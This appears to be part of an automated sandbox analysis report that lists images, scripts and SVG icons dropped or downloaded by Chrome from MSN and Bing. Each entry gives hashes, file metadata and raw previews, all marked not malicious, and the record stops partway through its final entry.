                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["social-bar-coachmark-manager"],{13757:function(t,e,o){o.r(e),o.d(e,{SocialBarCoachmarkManager:function(){return _}});var n=o(33940),i=o(84486),a=o(86331),r=o(97555),l=o(65453),c=o(71219);const s=864e5;var d=o(49218),u=o(28904),m=o(42590),g=o(78923),f=o(69178);let h=class extends u.H{constructor(){super(...arguments),this.description=""}get coachmarkText(){return this.description.replace("{0}",(0,f.T)("ThumbUpvote","regular","20px")).replace("{1}",(0,f.T)("ThumbDownvote","regular","20px"))}};(0,n.gn)([m.Lj],h.prototype,"description",void 0),h=(0,n.gn)([(0,u.M)({name:"social-bar-coachmark-body",styles:g.i`svg { fill: currentcolor; position: relative; top: 3px; }`,template:d.dy`${t=>d.dy`${d.dy.partial(t.coachmarkText)}`}`})],h);var p,v,C,D,S,P=o(56692);!function(t){t.Above="Above",t.Below="Below",t.Left="Left",t.Right="Right"}(p||(p={})),function(t){t.Adjacent="Adjacent",t.C
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1624
                                                                                                                                                                                                                                                                        Entropy (8bit):4.773562716145102
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:ko6ep61GB008wgl/oyBmKXCdUYAQhYzQe:lHLvVg/oyBmdHAQ
                                                                                                                                                                                                                                                                        MD5:EBAA114857D4BA27C1E02CA510B7AA7A
                                                                                                                                                                                                                                                                        SHA1:DD4A102A4556A090233348BFE9334BCB6C947EE0
                                                                                                                                                                                                                                                                        SHA-256:0B83BBA98B4FB994F34C52EA7D42CB081AB93E663180662EFCD396A9CDD09CDA
                                                                                                                                                                                                                                                                        SHA-512:0BD3F45EC580E2037D09A81106EDCBDA5EA38CD7F58573E68A074F79BADBFEC3C2554A2193E82C66ED1E64248DA6001ABF6D60C8A45180088F4082E8817183C7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx.]S[HTQ.]..;wf.........1...#$*.@HQ{|....H.E...G..)APB?.OA.i..!......4..5...G......}............%U.u...<#.... .M...1a..`F.....c-....b........\...M.....~...XZ...].....(.cm.LQZ..QH..E....,.Q.|.|.u.61.)3..X`..G`h*..].5.C......fy...ge..R..d... ..."/.`n..0.@.].....&.C...s9....N...M..C...&C......+g.a.....,.....ig.B..0..`)^..MfI.Jcq.....:.kc...a.-...O..y..rC...c....52.d...3..].CB.a.|.,=....SP........0T......X.Hq......?.>?....P..M.._..S`...B\XS.X...A7L..iD_.C9.3.c^."/.X.;De:...@.......@LV39..E..[.".R.&h.H.d..Ji%,U.PGF.?...4.x-............s....o.l..a)..&...vD.>.Y..w.4..i.{...QR%...wp\.....D.~@..]D...V3..<...:;l.H.f...M/..R.fD..b.k+..C..L....l.W.M6 ... .d..]....|...jvG..BWJ<0?....... D.zZ..#.'i...c.Y7.iO.....(&..+../Ni.q....IEND.B`.............................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1324
                                                                                                                                                                                                                                                                        Entropy (8bit):4.7183372945791175
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7exe9QVsVsyPXSF/yC9H9eAWw0uac+5SsciTpvFwf8abKP3LRkP06yfor/y1J:aYsOyPCFBPHac+Esc0w0abeL+PhyQw
                                                                                                                                                                                                                                                                        MD5:01F55EF8E6EE276794A2FA5712D40347
                                                                                                                                                                                                                                                                        SHA1:0B6B137463DC897215ECAA2810C793AF4DADC1AF
                                                                                                                                                                                                                                                                        SHA-256:AC394B126F99224EF9FD7B9A98C02FA22E41146B2534CA789BF7567C528BB322
                                                                                                                                                                                                                                                                        SHA-512:7253EAA00E10BEDD6B9E41FDB826F241ACFA7F0CC11BFB0B775B9E99104373388B07EAE0525B2023FC796FEF02A8CD63E929DFACC3AC4B052D061CF2B5E99B97
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....XIDATx.mS.K.a.=...A"aKJ....P........4. TC. .6....NB.S....... ..W......{.KOJ]...}.=.{.y$...~..p...7.Q.T.........M&....xyy..k.Z....obbb......!...XQ.VC.P@.....5&''......hV(.........T.f....."'...>.........O.L&X,.P.......!.Jquu...#(.J....R..\.....1==.E'''....*:...>??38!....V..l6!.H......G.q}}.....D...+........A..!..1#.L.....}.........._......`....F.e>..g.....`~~^.......P....(.=X.V.B...7.........gggH..h.Z\LN...E$...G.....z.4;Y8....t.\.s..`..h.F..^...F..\...5..A..U,.Q.T`...d@k.o.....8...f....v..~.Z....R.....&..,{@..cgg.....)...dYz4$...9.yaa................. @...nll.v...yF.11#.^...$H..f.......J...7{.....IEND.B`...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):395697
                                                                                                                                                                                                                                                                        Entropy (8bit):5.91590407182338
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:EF31/DZV2feDPlwk0gXFjRdQD8g3DpiUuEv:g1/T2GDbXTDgjB
                                                                                                                                                                                                                                                                        MD5:B54ADBC21E9E3AED86E1DDDE37C5CA97
                                                                                                                                                                                                                                                                        SHA1:4BBEDE66F8265117D5AECF21C9433643D5A792F7
                                                                                                                                                                                                                                                                        SHA-256:AE20917774D90D41E06253B61F72DB157F25A3CF44150AA3BB6780536260CC80
                                                                                                                                                                                                                                                                        SHA-512:5613E3E67FD5BBDD281E96AA20C850B08713EBB6AD181D8B7B935C622E0B8A7B5D6979CD43624D447345D14A426999BD0932C513B3C1FC9CBF49CDE2F608E5EF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var __assign=this&&this.__assign||function(){return __assign=Object.assign||function(n){for(var t,r,i=1,u=arguments.length;i<u;i++){t=arguments[i];for(r in t)Object.prototype.hasOwnProperty.call(t,r)&&(n[r]=t[r])}return n},__assign.apply(this,arguments)},__rest=this&&this.__rest||function(n,t){var u={},r;for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&t.indexOf(i)<0&&(u[i]=n[i]);if(n!=null&&typeof Object.getOwnPropertySymbols=="function")for(r=0,i=Object.getOwnPropertySymbols(n);r<i.length;r++)t.indexOf(i[r])<0&&Object.prototype.propertyIsEnumerable.call(n,i[r])&&(u[i[r]]=n[i[r]]);return u},__spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},__awaiter=this&&this.__awaiter||function(n,t,i,r){function u(n){return n instanceof i?n:new i(function(t){t(n)})}return new(i||(i=Promise))(function(i,f){functi
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10033), with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):12933
                                                                                                                                                                                                                                                                        Entropy (8bit):5.214423450434363
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:VbgMOzLnhnvZ1czzHT3L0SKZp2NbltyQEZxAk/MI7hBMDIkFi2o6XJalZW:9OZrSzz3wp0OxAmJjEl
                                                                                                                                                                                                                                                                        MD5:3E1CD65B12888A023F899069EB6FD830
                                                                                                                                                                                                                                                                        SHA1:5DC4BB155BEB355755C78FA0D991C45696497794
                                                                                                                                                                                                                                                                        SHA-256:B8BB4D94B0FCFECEAE541A257DEA9BC8F598C2E008BEB857274607868BA3FB10
                                                                                                                                                                                                                                                                        SHA-512:4EBCDE6C74FD61AD31560DEE7014EEC65B7618D53572C615CFD77F1D3B7F485D3FF95C0B3F5AA52CBB1EEE41F6A23F5253B076CF2C032FD5284C6B63BF64D4B4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/XcS7FVvrNVdVx4-g2ZHEVpZJd5Q.js
                                                                                                                                                                                                                                                                        Preview:0;..;..!function(n,l){"object"==typeof exports&&"undefined"!=typeof module?l(exports):"function"==typeof define&&define.amd?define(["exports"],l):l(n.preact=n.preact||{})}(this,function(n){if(n.render){return;} var l,u,i,t,o,f,r,e={},c=[],s=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i;function a(n,l){for(var u in l)n[u]=l[u];return n}function v(n){var l=n.parentNode;l&&l.removeChild(n)}function h(n,l,u){var i,t,o,f=arguments,r={};for(o in l)"key"==o?i=l[o]:"ref"==o?t=l[o]:r[o]=l[o];if(arguments.length>3)for(u=[u],o=3;o<arguments.length;o++)u.push(f[o]);if(null!=u&&(r.children=u),"function"==typeof n&&null!=n.defaultProps)for(o in n.defaultProps)void 0===r[o]&&(r[o]=n.defaultProps[o]);return y(n,r,i,t,null)}function y(n,u,i,t,o){var f={type:n,props:u,key:i,ref:t,__k:null,__:null,__b:0,__e:null,__d:void 0,__c:null,constructor:void 0,__v:o};return null==o&&(f.__v=f),null!=l.vnode&&l.vnode(f),f}function p(n){return n.children}function d(n,l){this.props=n,this.context
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):24303
                                                                                                                                                                                                                                                                        Entropy (8bit):7.96423252705246
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:e4hunDxDPOozcisb98hd73c0YzmO5h/XbFMFP2f6ELrtdIM4KjA6GXwQF7qmQkGU:eGunhPjAisu7c5h/XbF4+yEHn34KjA6u
                                                                                                                                                                                                                                                                        MD5:9BE11D075B63C514FFC7CA3120DB5AF5
                                                                                                                                                                                                                                                                        SHA1:6607C84808FFEC7B5E79E02BCFB64C84E3A53509
                                                                                                                                                                                                                                                                        SHA-256:C7BDC34921658FDF0D33964673A468BAAF6D64B1BCC8A37276A08ABA25884DE5
                                                                                                                                                                                                                                                                        SHA-512:07EF79D76F509D4A833D90D15998E10CA27B2BA978CACDE5CADF0A5C9B8C1E7094A19BC5FD48E77F2638F36BB6E0E2405D07BF31AD7CA7316E6C1810C96277A4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...W.:...wi.......c.....n<..^k.P.1?.{.....^$...\.oc..".g.?z.G....y&Y..)RU...+..'..+.:v...z..o--.4..5PCp\...k..i6....r..\..v.....Qr.<Mn..[.q.Qk;.X.....q..Ibp._...Z.5....RI.u.}.+.|2.4}'F.V...\...F.l.e....;...27....M.v..3..k.........j...[a%....D..d.!...Eb..]....s.[X.Zv..'X3.f..._..<.omm.,..=..H..D.bgc..T...u.7.2.._......~...^..e.4.v...4I$..J.GqR...sY..M..[3E.Sz
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):15738
                                                                                                                                                                                                                                                                        Entropy (8bit):7.962121211990795
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:e98CzS3KgO3CKxiMhdbyzfu/b6bi3dXokSDKMYn+EG6:e9vS3KgOnMMhVKfSObQ2kSDrY+ED
                                                                                                                                                                                                                                                                        MD5:668C3E51B7D9E01F7A9051AFE8D481C0
                                                                                                                                                                                                                                                                        SHA1:895F50430B6374D6451EDECE4FF88BDC3AEB042E
                                                                                                                                                                                                                                                                        SHA-256:80F8BD7F3A9ED8538B866158C16CC0A720C732DB548CDCE3B8062745DADBDC2D
                                                                                                                                                                                                                                                                        SHA-512:B85426B2B290F67C00E7962CEB166EF78C6C80C373ADF5756DCA56287D46B080CF7C73CE2FF74BD36F5125C5EE09ECAA512F6DEE41D64030BDE14927B18B5FA1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....T...`CSQ.nk.........n...1V#p....`{P......8...~.WZym...FN3......kvZ[y..n^9../..}..Q...qq..c...|.t'....F.: .?6.nm.M........P....)...;...e.}e...).L....=.,.i.L.W.Y.2O.:..."...yk....z...E*...u..n[..;....V.w.............M.....O.k..4..."......Nm...Nk.<#.....S,2w...)..J\....m.....~.b.......f..o..c&c..t....yp7.&>.x.>..C..Y...P.H.n....+K.:..gg#A.SnY..?........
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):469
                                                                                                                                                                                                                                                                        Entropy (8bit):4.629787805928795
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:trrzSuoUAMHYJzB3zik04HS0u0fzgOOqiN75qAMP:tfzScAM4JzFukJNu07gVN7I/
                                                                                                                                                                                                                                                                        MD5:472185A4E75B520DC563EF944EA414D1
                                                                                                                                                                                                                                                                        SHA1:ABCF5A6CC96DE0FC06C3E61B524CEA7B179797DB
                                                                                                                                                                                                                                                                        SHA-256:5BEC0E52B149217FBFB5973B131F98012BFF1FEE2A9B1C5B37F1DC01A0011265
                                                                                                                                                                                                                                                                        SHA-512:0FB5E92715C722B81DE7EA34CCDEE65FD56BB4BF9FB2C1D5D255BCB6AC82C33B1B9AFA34E980FB6067C16E99C88A35C56D51345DE36A99B020F349E9F17F1D59
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/NoColor_Card/rightArrow.svg
                                                                                                                                                                                                                                                                        Preview:<svg width="7" height="12" viewBox="0 0 7 12" class="weather-arrow-glyph" xmlns="http://www.w3.org/2000/svg">.. <path d="M0.528512 0.861886C0.268165 1.12224 0.268165 1.54435 0.528512 1.8047L4.72379 5.99996L0.528512 10.1952C0.268165 10.4556 0.268165 10.8777 0.528512 11.138C0.788865 11.3984 1.21097 11.3984 1.47133 11.138L6.13799 6.47136C6.39832 6.21103 6.39832 5.78889 6.13799 5.52856L1.47133 0.861886C1.21097 0.601539 0.788865 0.601539 0.528512 0.861886Z"/>..</svg>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1111
                                                                                                                                                                                                                                                                        Entropy (8bit):4.1426352870909255
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:tDbU/vj3Dx8DDolDLN9wBWUyDa8uz5fCMe4I/76GVf8wz1vVsG4Iu5Tz1mH38zRO:y/b9EolDLf6WUmUzhvr+76GLz16Jk8tO
                                                                                                                                                                                                                                                                        MD5:5E834A775C3B3F93F83F7C48E5286257
                                                                                                                                                                                                                                                                        SHA1:7F6D63952326103378DCE69ABDC75A07EECF86AD
                                                                                                                                                                                                                                                                        SHA-256:006563DB23523A6369D81FCFA6F3515F0317CF651D74024635D2BFBE694779B8
                                                                                                                                                                                                                                                                        SHA-512:D575CF4076626957D2AF68EF808930910969244E989CDB770CE303900471A52ACCC36F52D1C0B1E7605AA4A5DD92ED1DC0540605CAC60C7317E27B7BD2C0EBEE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/f21jlSMmEDN43OaavcdaB-7Phq0.svg
                                                                                                                                                                                                                                                                        Preview:<svg fill="none" height="24" viewBox="0 0 24 24" width="24" xmlns="http://www.w3.org/2000/svg"><path d="m19.6667 0c2.3932 0 4.3333 1.94011 4.3333 4.33333v4c0 .55228-.4477 1-1 1s-1-.44772-1-1v-4c0-1.28866-1.0447-2.33333-2.3333-2.33333h-4c-.5523 0-1-.44772-1-1s.4477-1 1-1zm-15.33337 0c-2.39324 0-4.33333 1.94009-4.33333 4.33333v4c0 .55228.44772 1 1 1s1-.44772 1-1v-4c0-1.28866 1.04467-2.33333 2.33333-2.33333h4c.55228 0 1-.44772 1-1s-.44772-1-1-1zm15.33337 24c2.3932 0 4.3333-1.9401 4.3333-4.3333v-4c0-.5523-.4477-1-1-1s-1 .4477-1 1v4c0 1.2886-1.0447 2.3333-2.3333 2.3333h-4c-.5523 0-1 .4477-1 1s.4477 1 1 1zm-19.6667-4.3333c0 2.3932 1.94009 4.3333 4.33333 4.3333h4c.55228 0 1-.4477 1-1s-.44772-1-1-1h-4c-1.28866 0-2.33333-1.0447-2.33333-2.3333v-4c0-.5523-.44772-1-1-1s-1 .4477-1 1zm12-3.6667c2.2092 0 4-1.7908 4-4s-1.7908-4-4-4-4 1.7908-4 4 1.7908 4 4 4zm0-2c-1.1045 0-2-.8955-2-2s.8955-2 2-2 2 .8955 2 2-.8955 2-2 2zm-6-6.66667c.73639 0 1.33333-.59694 1.33333-1.33333 0-.73637-.59694-1.33333-1.33333
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4021
                                                                                                                                                                                                                                                                        Entropy (8bit):7.876050896981863
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEto8lel12id3xybhdSs9pr0LjDk38EskDl:yg5CeL3xytIsfADkpJ
                                                                                                                                                                                                                                                                        MD5:4664BB9D224801CF85C7C8F12BC4AFA7
                                                                                                                                                                                                                                                                        SHA1:D97A9B590A77AA484C81BA4DCBFEF492EEAB1EE9
                                                                                                                                                                                                                                                                        SHA-256:F3126317CD4E3789CE1D3A54C8414EEDBF2C16B8688138A33DCCBBC5AAC6A085
                                                                                                                                                                                                                                                                        SHA-512:BB0CCC2242BA9D4EDDFFF4599C872683F92C4AF4FD091E60FE260C29286257C073D46582F5FFD62DCC962697CA861E1539438EF66E2AF606B531F6683B5FBE17
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_dqygWER8kwreOfODV2UJ0g&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....eO.Q.Wm.K.l..V6.6...+m...NPv..E..^_.7o.O......h..}.._.X...........p ...b.).HR....i.T.).Qp+.{..........`....c..........h.i...}n..Z..m.MJ....ZH?.8..X.>...8.Y..C..'.....M}..`NA.r>!.V.?.....Dw....b2J...8..K.6..Z.6yIQ....H..Z..P..E..H.*.;...5..Z2..............{;.Wi..2............3..YZc).H.H.c.v..S....p..m...%.l...u_.?S.....Z..F.h......T.78.....].$\.@<..E..lb.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 58 x 59, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):5339
                                                                                                                                                                                                                                                                        Entropy (8bit):7.952386577766305
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:M23YP+n5adWK8bvMEYxbGb+2htMaLTje1aHQZ0Q8wnP5OCRf2FJ0sT:MzP+5ofUkt+hBL2Yw2rwnhFgqI
                                                                                                                                                                                                                                                                        MD5:C49766495653BB160FE23C0303734B7B
                                                                                                                                                                                                                                                                        SHA1:0FE8447570BB1BE0E0BD5FED00AE01A1D599EE7A
                                                                                                                                                                                                                                                                        SHA-256:BC9DD5F6FB6506EAEDCC886C79B6C72BE115A72664C9EAA2B0F89CC04D63481E
                                                                                                                                                                                                                                                                        SHA-512:7E41B4163905A6C7578F0F0AC50542FE378C1F7B919A9DDEFA04BFAB13A612B9F1BC3229684C290087AC4E4F14511968FB4F1BE770EF9987114C98144CB6FC87
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR...:...;.....*.....IDATx..[y...u..3...^..j%D.....Y..#.!8....*WH.`.e....@.)J..b...@...&&.6.c..K...b% .\...VZ.......^_.Z....j.|=.=....=....0.-..>...f..]p......X../]...kj...!.5..8$(.A.E..e.....q.)..&Mj.3gN....i....f...??..xz....G............U.8..m..u..[a...|n!c...2'...p`.,....X..8..Wj..R{.....c..N....}......=7.tS....(@..".k...Komo?o.../,..?......?.&....(..Z..D...3x-.pCT...../o.......U[<..1cL..<>0P.N._.P.2.7o.:..}......Z...7#6h......b.ag............R....p]...cxm_.^.T...@....*.X{..F..P.?4..........c....f.....r.W..Hn.4.w..,.o.R.S.#.B.K..{.k...~.V./..A.L..F.n.<..I.Q....{.@.....%/.J....p<.x...._.#.s'.p.Y...*........f.JdL.7.]..Do)........`....[......Bdv........>..?........>o..jy.q98.....H}.|.."..H.RS..K..H\.t....J....=W.<..'.,YRCz..:....AR.....u.l....zm.1..1..zZ..9.G8....Z|..Q!t?3..+I3..6R..5.......S........y.j+W.<*....I.......v.b.....pUg.VL.A...4P...n........}.....DBq.)...).KN.JW-...N.........-.....tS......._..-.F(I.y...E..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1274
                                                                                                                                                                                                                                                                        Entropy (8bit):4.76866515748201
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7ZA0RnsK88Dl3r5JCyJ3/M+yEoi1iwQfk/zOkKJFwmvAGaMIDgA3e66u/:sRsKtpr5JFJPMy3n/WrwxGazDgA3H
                                                                                                                                                                                                                                                                        MD5:BC2CA4C02D8330860D34A943488A7A45
                                                                                                                                                                                                                                                                        SHA1:EEB8859DE80E94571F7E906BDFAAFA9C98E493B7
                                                                                                                                                                                                                                                                        SHA-256:5CD4E73D22042B54B0648341D22DCE5E089F6ADAAD76FE70083CD545D36CD9C4
                                                                                                                                                                                                                                                                        SHA-512:335D1C0EEDC3235770F81CF37EF36649474B9A23E4D924EDD681A6BD8674A3A89E48B77AA788ED3ABEB6881884832D9F066B76486609CDE303EE3D61F7FA6FEC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyxfDD.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....?IDATx..SMK.Q.~4.......Z..B.i..@.....q.O. ...~..B..V...>tSY..@C.E0(.U!.w.x_.....9sf.y.9.....o.s.........F..Z....+.L&,..b}}.[[[.S..]..`0.`{{....L....t:\..ex<........D....p.....7.d.YT*......i...".L"......d...(kkk....coo.....%xxx.^.G".@8.F..'.....<o0..@...L.........{~~..)...Uptt.@&..,J.Au.J%..,k......r.......f......u:....>??...D...YM&.:EI...f.\..h...%vvvH...H I...x||....cV.....A(....lb<..v8..I...P............6+......1Q..!.......V.%.r9^..*O.`IV.,..oE#.C...v..n.K.y@.j./.........\i..V.....kD.Q6M.'}..FZ....qrr...U.U..'.|>...X,.3..|...%D"..R)...h`..g.#.^y.2.C...%.."j.}....IEND.B`............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1683
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1898179833107125
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:tDKeUAmPopXrdMmgVTAfya6SWunZ5SsuoAu0:tvUAmPM2AfpxWwZ5SsLA/
                                                                                                                                                                                                                                                                        MD5:9A495CA26166DD65150A25F7162B04A8
                                                                                                                                                                                                                                                                        SHA1:26AD1042A8C68812C0627EB8310623A73440F059
                                                                                                                                                                                                                                                                        SHA-256:9C92C7F3F636136678523BA263DE733DC183AAFD465BA42D51BF710830E52CAF
                                                                                                                                                                                                                                                                        SHA-512:81B300E00388AA5BA7C6EFCE59B7FB27CBC1EF941845206F32A770738AD262AF944B36D9206B5C203FFA393647312D97D59209504EA0332C5CFAC28517BB360F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<script type="text/javascript" nonce="7xVLkGS+SOtITORlJIAT0Jh/5YKT07g4PKM8T2qdtaU=">//<![CDATA[.sj_evt && sj_evt.bind( "onRALoad", function() { var reportActivityModule = new ModernRewards.ReportActivity({"AnimateHeader":true,"IsAuthenticated":false,"DashboardUrl":"/rewards/dashboard","IsMobileClient":false,"RewardsIncrement":1,"RewardsSessionData":{"IsRewardUser":false,"IsLinkedUser":false,"IsTenantEnabled":false,"IsAadUser":false,"IsTrialUser":false,"TrialUserClaimBalance":0.0,"IsRebatesUser":false,"IsRebatesDeniedUser":true,"Balance":0,"RewardsBalance":0,"GiveBalance":0,"RebatesBalance":0.0,"IsGiveModeOn":false,"PreviousBalance":0,"GoalTrackBalance":200,"IsLevel2":false,"IsOptOut":false,"IsSuspended":false,"ShowAnimation":false,"IsRedirectedFromOldDashboard":false,"ImpressionLifeTimeCount":2,"DailyImpressionHPCount":1,"DailyImpressionSerpCount":0,"VisitedCount":2,"LastVisitTime":"2023-12-06T08:00:00Z","LastAutoOpenFlyoutTime":"0001-01-01T00:00:00","AutoOpenFlyoutFlag":false,"IsCLOUs
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):16687
                                                                                                                                                                                                                                                                        Entropy (8bit):7.950672537236447
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:e3YZ/H50YgKyHdSBNOF1ID2CcyQ8zIZy6WlplzPU:ee0R/KOFIcdUNlplzPU
                                                                                                                                                                                                                                                                        MD5:0A8621F424090CFF344AE4E11B087D8D
